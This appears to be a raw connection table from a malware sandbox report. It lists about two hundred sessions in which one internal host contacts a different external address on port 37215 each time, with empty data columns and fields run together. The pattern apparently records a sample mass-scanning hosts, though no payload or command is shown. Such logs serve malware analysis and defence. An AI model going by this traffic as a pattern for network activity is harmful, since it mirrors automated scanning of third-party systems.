                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6096192.168.2.1545698156.2.255.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6097192.168.2.1554992156.152.96.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6098192.168.2.1551542156.161.51.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6099192.168.2.1540668156.165.28.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6100192.168.2.1559316156.176.164.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6101192.168.2.1544782156.100.114.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6102192.168.2.1549332156.188.198.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6103192.168.2.1545122156.222.219.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6104192.168.2.1549104156.181.244.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6105192.168.2.1551696156.125.89.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6106192.168.2.1549984156.126.80.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6107192.168.2.1536464156.231.196.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6108192.168.2.1550750156.101.49.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6109192.168.2.1558444156.21.41.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6110192.168.2.1537520156.223.181.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6111192.168.2.1558094156.202.26.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6112192.168.2.1538042156.243.214.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6113192.168.2.1558426156.14.112.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6114192.168.2.1559202156.119.156.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6115192.168.2.1559064156.123.139.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6116192.168.2.1558774156.209.163.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6117192.168.2.1549698156.199.90.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6118192.168.2.1543540156.42.131.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6119192.168.2.1535004156.179.43.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6120192.168.2.1557272156.134.162.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6121192.168.2.1535150156.192.2.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6122192.168.2.1556570156.88.177.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6123192.168.2.1548878156.189.220.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6124192.168.2.1540022156.25.126.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6125192.168.2.1544952156.123.194.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6126192.168.2.1545498156.9.148.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6127192.168.2.1559398156.185.160.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6128192.168.2.1554074156.67.11.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6129192.168.2.1537634156.228.48.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6130192.168.2.1548574156.168.182.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6131192.168.2.1533348156.6.169.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6132192.168.2.1537694156.8.71.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6133192.168.2.1549900156.65.237.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6134192.168.2.1548110156.76.184.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6135192.168.2.1542714156.48.134.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6136192.168.2.1551208156.188.40.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6137192.168.2.1533270156.187.175.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6138192.168.2.1544888156.164.122.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6139192.168.2.1546648156.230.197.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6140192.168.2.1548152156.244.202.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6141192.168.2.1550602156.37.248.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6142192.168.2.1553608156.133.1.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6143192.168.2.1560684156.196.245.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6144192.168.2.1559680156.205.239.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6145192.168.2.1550980156.136.14.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6146192.168.2.1534902156.143.18.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6147192.168.2.1539098156.37.120.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6148192.168.2.1554706156.238.235.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6149192.168.2.1553722156.3.102.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6150192.168.2.1542290156.36.64.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6151192.168.2.1549116156.66.193.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6152192.168.2.1537678156.73.60.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6153192.168.2.1541198156.105.240.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6154192.168.2.1551992156.155.178.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6155192.168.2.1558666156.224.152.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6156192.168.2.1557506156.41.169.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6157192.168.2.1539860156.84.68.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6158192.168.2.1557666156.129.104.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6159192.168.2.1558298156.85.95.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6160192.168.2.1532992156.138.192.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6161192.168.2.1537676156.25.143.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6162192.168.2.1553930156.78.60.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6163192.168.2.1560358156.115.191.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6164192.168.2.1550752156.188.102.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6165192.168.2.1549252156.108.195.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6166192.168.2.1547326156.77.95.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6167192.168.2.1557562156.208.203.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6168192.168.2.1557426156.149.55.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6169192.168.2.1551676156.43.214.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6170192.168.2.1554964156.227.205.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6171192.168.2.1555722156.39.46.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6172192.168.2.1542694156.110.12.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6173192.168.2.1535788156.241.158.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6174192.168.2.1548974156.86.157.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6175192.168.2.1543962156.4.101.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6176192.168.2.1539516156.153.153.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6177192.168.2.1548438156.160.3.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6178192.168.2.1539258156.12.139.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6179192.168.2.1556806156.221.70.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6180192.168.2.1541898156.99.136.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6181192.168.2.1554150156.199.133.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6182192.168.2.1550336156.219.214.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6183192.168.2.1547214156.9.16.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6184192.168.2.1542138156.149.246.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6185192.168.2.1536102156.113.203.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6186192.168.2.1548428197.206.115.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6187192.168.2.1556820197.28.143.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6188192.168.2.1539562197.99.185.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6189192.168.2.1542910197.183.159.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6190192.168.2.1554530197.87.197.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6191192.168.2.1537760197.84.201.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6192192.168.2.1534910197.235.212.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6193192.168.2.1544542197.157.223.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6194192.168.2.1548440197.11.229.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6195192.168.2.1560838197.67.53.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6196192.168.2.1552380197.140.52.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6197192.168.2.1541628197.157.245.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6198192.168.2.1555434197.199.180.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6199192.168.2.1545658197.54.244.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6200192.168.2.1538856197.9.81.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6201192.168.2.1557054197.129.88.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6202192.168.2.1557338197.170.166.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6203192.168.2.1544820197.203.211.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6204192.168.2.1544252197.172.241.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6205192.168.2.1548052197.233.162.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6206192.168.2.1545308197.140.247.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6207192.168.2.1550326197.40.203.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6208192.168.2.1548308197.179.144.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6209192.168.2.1547012197.245.196.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6210192.168.2.1549588197.5.118.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6211192.168.2.1555352197.24.92.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6212192.168.2.1541458197.161.182.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6213192.168.2.1549248197.205.30.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6214192.168.2.1544226197.101.253.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6215192.168.2.1556046197.153.242.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6216192.168.2.1559350197.58.146.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6217192.168.2.1556182197.151.207.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6218192.168.2.1555474197.241.203.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6219192.168.2.1557608197.42.178.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6220192.168.2.1544262197.42.159.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6221192.168.2.1553754197.45.198.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6222192.168.2.1556428197.142.249.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6223192.168.2.1553132197.29.30.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6224192.168.2.1555656197.29.185.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6225192.168.2.1538950197.179.12.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6226192.168.2.1552424197.178.159.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6227192.168.2.1538660197.208.26.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6228192.168.2.1534578197.180.27.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6229192.168.2.1533022197.218.49.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6230192.168.2.1543764197.66.64.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6231192.168.2.1544662197.79.192.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6232192.168.2.1542014197.174.156.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6233192.168.2.1558604197.199.166.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6234192.168.2.1538214197.211.232.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6235192.168.2.1545790197.112.75.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6236192.168.2.1554704197.3.49.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6237192.168.2.1545854197.116.253.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6238192.168.2.1553258197.40.139.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6239192.168.2.1536708197.222.241.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6240192.168.2.1543438197.53.228.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6241192.168.2.1551808197.18.32.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6242192.168.2.1535228197.236.17.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6243192.168.2.1534350197.131.178.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6244192.168.2.1557248197.237.83.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6245192.168.2.1556358197.55.63.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6246192.168.2.1539512197.176.55.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6247192.168.2.1538958197.151.203.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6248192.168.2.1556160197.114.106.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6249192.168.2.1552028197.141.16.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6250192.168.2.1557184197.69.219.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6251192.168.2.1548124197.51.16.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6252192.168.2.1546298197.13.118.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6253192.168.2.1539128197.71.227.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6254192.168.2.1547902197.241.94.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6255192.168.2.1555706197.170.7.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6256192.168.2.1554016197.33.220.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6257192.168.2.1554682197.209.128.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6258192.168.2.1536670197.108.180.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6259192.168.2.1559194197.72.164.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6260192.168.2.1535770197.142.9.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6261192.168.2.1555506197.46.166.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6262192.168.2.1536482197.8.146.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6263192.168.2.1535928197.137.56.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6264192.168.2.1537744197.92.183.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6265192.168.2.1546802197.62.59.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6266192.168.2.1535368197.200.88.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6267192.168.2.1552092197.213.5.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6268192.168.2.1538538197.109.62.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6269192.168.2.1547848197.25.198.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6270192.168.2.1534414197.212.134.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6271192.168.2.1536074197.223.152.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6272192.168.2.1541582197.106.187.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6273192.168.2.1559758197.16.20.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6274192.168.2.1536474197.155.102.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6275192.168.2.1545146197.150.23.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6276192.168.2.1548632197.210.143.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6277192.168.2.1554286197.14.51.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6278192.168.2.1544310197.255.74.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6279192.168.2.1540384197.2.27.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6280192.168.2.1545088197.169.176.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6281192.168.2.1554840197.82.230.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6282192.168.2.1550152197.28.204.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6283192.168.2.1556412197.20.38.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6284192.168.2.1556748197.82.214.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6285192.168.2.1542712197.188.213.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6286192.168.2.1542572197.223.236.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6287192.168.2.1554564197.86.254.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6288192.168.2.1548846197.133.33.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6289192.168.2.1547206197.161.149.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6290192.168.2.1554940197.81.172.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6291192.168.2.1544762197.83.117.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6292192.168.2.1556386197.117.72.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6293192.168.2.1547704197.65.122.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6294192.168.2.1554598197.193.164.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            6295192.168.2.1559200197.202.1.7137215
